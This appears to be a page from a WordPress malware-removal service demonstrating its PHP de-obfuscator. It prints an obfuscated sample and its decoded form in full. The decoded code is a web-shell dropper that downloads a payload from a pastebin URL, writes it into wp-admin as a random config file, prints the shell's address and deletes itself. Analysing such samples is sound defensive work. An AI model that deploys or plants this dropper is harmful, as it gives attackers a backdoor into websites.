De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $ipybwnfpnzjf="S\x68\x65\x6cltx\x74";${"G\x4c\x4f\x42\x41\x4cS"}["fv\x71\x64w\x6e\x6ee\x69\x65\x7a"]="\x66\x6f";${"\x47L\x4f\x42\x41L\x53"}["\x7a\x76qq\x66\x75di\x63\x65"]="c";${"\x47L\x4fB\x41\x4c\x53"}["\x6bd\x65\x73\x6ey"]="\x72\x78";${"\x47\x4c\x4f\x42AL\x53"}["\x6d\x6e\x79\x72\x79u"]="\x6d\x69\x6e";${"\x47\x4c\x4f\x42A\x4c\x53"}["qoqk\x6ft\x76\x6f"]="\x53\x68e\x6c\x6ctx\x74";${"\x47\x4c\x4fBA\x4cS"}["d\x70\x6age\x6be\x65\x6did\x71"]="ma\x78";${"\x47LO\x42AL\x53"}["\x75\x6d\x77\x71\x77\x67\x71\x65\x73o\x70"]="m\x69n";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x75\x6d\x77\x71\x77\x67\x71e\x73o\x70"]}=0;$lxxkisxtrc="ma\x78";${${"GLO\x42\x41L\x53"}["\x64pj\x67\x65k\x65\x65m\x69\x64\x71"]}=999999;${${"\x47\x4c\x4fBA\x4c\x53"}["\x6bd\x65\x73\x6ey"]}=mt_rand(${${"\x47\x4c\x4fB\x41L\x53"}["\x6d\x6eyr\x79u"]},${$lxxkisxtrc});${"G\x4c\x4f\x42\x41\x4c\x53"}["lo\x79\x64uyfl\x65"]="\x66o";function http_get($url){${"\x47\x4cO\x42\x41LS"}["\x6f\x6b\x73i\x6fg\x73\x6f"]="u\x72\x6c";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x7a\x76\x71\x71f\x75\x64\x69ce"]}=curl_init(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6fk\x73\x69\x6f\x67s\x6f"]});$lcbhvhlxgb="c";curl_setopt(${${"G\x4c\x4f\x42\x41\x4cS"}["\x7av\x71\x71\x66\x75\x64\x69\x63\x65"]},CURLOPT_RETURNTRANSFER,1);$ccqqpup="\x63";curl_setopt(${${"\x47\x4c\x4f\x42A\x4c\x53"}["zv\x71q\x66\x75dic\x65"]},CURLOPT_CONNECTTIMEOUT,10);curl_setopt(${$ccqqpup},CURLOPT_FOLLOWLOCATION,1);curl_setopt(${$lcbhvhlxgb},CURLOPT_HEADER,0);return curl_exec(${${"\x47\x4c\x4fB\x41\x4cS"}["zv\x71\x71\x66\x75\x64\x69\x63e"]});curl_close(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x7a\x76\x71qf\x75d\x69c\x65"]});}${${"GL\x4f\x42A\x4c\x53"}["q\x6f\x71\x6b\x6f\x74v\x6f"]}=http_get("h\x74\x74p\x73://\x70a\x73t\x65bin.com/\x72a\x77/\x68\x55\x45qy\x593m");${${"\x47\x4cOB\x41\x4cS"}["\x66\x76qdw\x6e\x6e\x65\x69e\x7a"]}=fopen("\x2e\x2e/../\x77p-a\x64\x6d\x69\x6e/\x75\x73er/c\x6f\x6e\x66\x69\x67-$rx.ph\x70","a");fwrite(${${"G\x4c\x4f\x42A\x4c\x53"}["l\x6fy\x64\x75\x79\x66l\x65"]},${$ipybwnfpnzjf});echo"\x68\x74t\x70://";echo$_SERVER["\x48\x54\x54\x50\x5fH\x4fS\x54"];echo"/wp-a\x64\x6d\x69\x6e/\x75\x73er/\x63onf\x69\x67-$rx.\x70\x68\x70";unlink("\x6d\x2e\x70\x68\x70"); ?>
<?php $ipybwnfpnzjf = "Shelltxt"; $GLOBALS["fvqdwnneiez"] = "fo"; $GLOBALS["zvqqfudice"] = "c"; $GLOBALS["kdesny"] = "rx"; $GLOBALS["mnyryu"] = "min"; $GLOBALS["qoqkotvo"] = "Shelltxt"; $GLOBALS["dpjgekeemidq"] = "max"; $GLOBALS["umwqwgqesop"] = "min"; $min = 0; $lxxkisxtrc = "max"; $max = 999999; $rx = mt_rand($min, $max); $GLOBALS["loyduyfle"] = "fo"; function http_get($url) { $GLOBALS["oksiogso"] = "url"; $c = curl_init($url); $lcbhvhlxgb = "c"; curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $ccqqpup = "c"; curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($c, CURLOPT_HEADER, 0); return curl_exec($c); } $Shelltxt = http_get("https://pastebin.com/raw/hUEqyY3m"); $fo = fopen("../../wp-admin/user/config-{$rx}.php", "a"); fwrite($fo, $Shelltxt); echo "http://"; echo $_SERVER["HTTP_HOST"]; echo "/wp-admin/user/config-{$rx}.php"; unlink("m.php");
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.